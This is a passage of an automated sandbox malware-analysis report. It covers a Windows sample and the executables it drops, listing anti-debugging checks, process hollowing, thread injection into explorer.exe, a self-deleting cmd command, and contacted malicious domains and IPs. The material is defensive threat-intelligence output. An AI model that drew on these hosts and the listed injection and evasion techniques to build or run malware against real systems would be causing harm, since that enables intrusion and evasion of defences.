Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount, 21_2_00401D96
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_00401280
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_00401090
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 19_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_004087E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 19_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00409970
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00866090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00866090
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_008614D0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_008612E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00868A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00868A30
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 19_2_00869D90
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00869BC0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 19_2_00869930
Source: C:\Users\user\Desktop\4f4deRCUD7.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\4f4deRCUD7.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_004376A0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_004376A0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_00790042 push dword ptr fs:[00000030h] 15_2_00790042
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00401000 mov eax, dword ptr fs:[00000030h] 19_2_00401000
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0040C180 mov eax, dword ptr fs:[00000030h] 19_2_0040C180
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0086092B mov eax, dword ptr fs:[00000030h] 19_2_0086092B
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00861250 mov eax, dword ptr fs:[00000030h] 19_2_00861250
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00860D90 mov eax, dword ptr fs:[00000030h] 19_2_00860D90
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0086C3D0 mov eax, dword ptr fs:[00000030h] 19_2_0086C3D0
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_0079092B mov eax, dword ptr fs:[00000030h] 21_2_0079092B
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00790D90 mov eax, dword ptr fs:[00000030h] 21_2_00790D90
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_00425770 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00425770
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004048D0 VirtualProtect ?,00000004,00000100,00000000 19_2_004048D0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0040B240 GetProcessHeap,RtlAllocateHeap,RegOpenKeyExA,RegQueryValueExA,RegCloseKey, 19_2_0040B240
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Memory protected: page guard Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_00425770 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00425770
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_004285C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004285C0
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep, 21_2_00409A6B

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: dodecoin.org
Source: C:\Windows\explorer.exe Domain query: bitly.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: short.link
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Domain query: botmaybe11.mcdir.me
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: bit.ly
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 8DDA.exe.11.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ewswwsi Memory written: C:\Users\user\AppData\Roaming\ewswwsi base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Memory written: unknown base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_00790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 15_2_00790110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Thread created: C:\Windows\explorer.exe EIP: 4DE1930 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Thread created: unknown EIP: 5C11930 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\3161.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Section unmapped: unknown base address: 400000 Jump to behavior
.NET source code references suspicious native API functions
Source: 3161.exe.11.dr, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 3161.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.3161.exe.610000.1.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.3161.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.3161.exe.610000.3.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.3161.exe.610000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.2.3161.exe.610000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.2.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.3161.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.3161.exe.610000.2.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.3161.exe.610000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 36.0.3161.exe.350000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 36.0.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 36.2.3161.exe.350000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 36.2.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 36.0.3161.exe.350000.2.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 36.0.3161.exe.350000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 36.0.3161.exe.350000.1.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 36.0.3161.exe.350000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Process created: C:\Users\user\Desktop\4f4deRCUD7.exe "C:\Users\user\Desktop\4f4deRCUD7.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Process created: C:\Users\user\AppData\Roaming\ewswwsi C:\Users\user\AppData\Roaming\ewswwsi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\1E73.exe" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 21_2_00406EDD
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree, 21_2_00407809
Source: explorer.exe, 0000000B.00000000.316841671.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.288823126.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.300791712.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000000.300321336.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.288660698.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.316528099.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000B.00000000.316841671.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.288823126.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.289933784.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.300791712.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.316841671.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.288823126.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.300791712.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.316841671.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.288823126.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.300791712.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.293941771.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.309739897.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.324261845.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 19_2_0040AE00
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping, 19_2_00434040
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping, 19_2_00434420
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s, 19_2_004328A0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 19_2_00432D90
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: __crtGetLocaleInfoA_stat, 19_2_0043D650
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 19_2_0086B050
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping, 21_2_00433930
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove, 21_2_00425200
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 21_2_004322A0
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 21_2_0043CB60
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping, 21_2_00433550
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__nh_malloc_dbg,___crtGetLocaleInfoA,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,__nh_malloc_dbg, 21_2_00431DB0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\2961.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3161.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
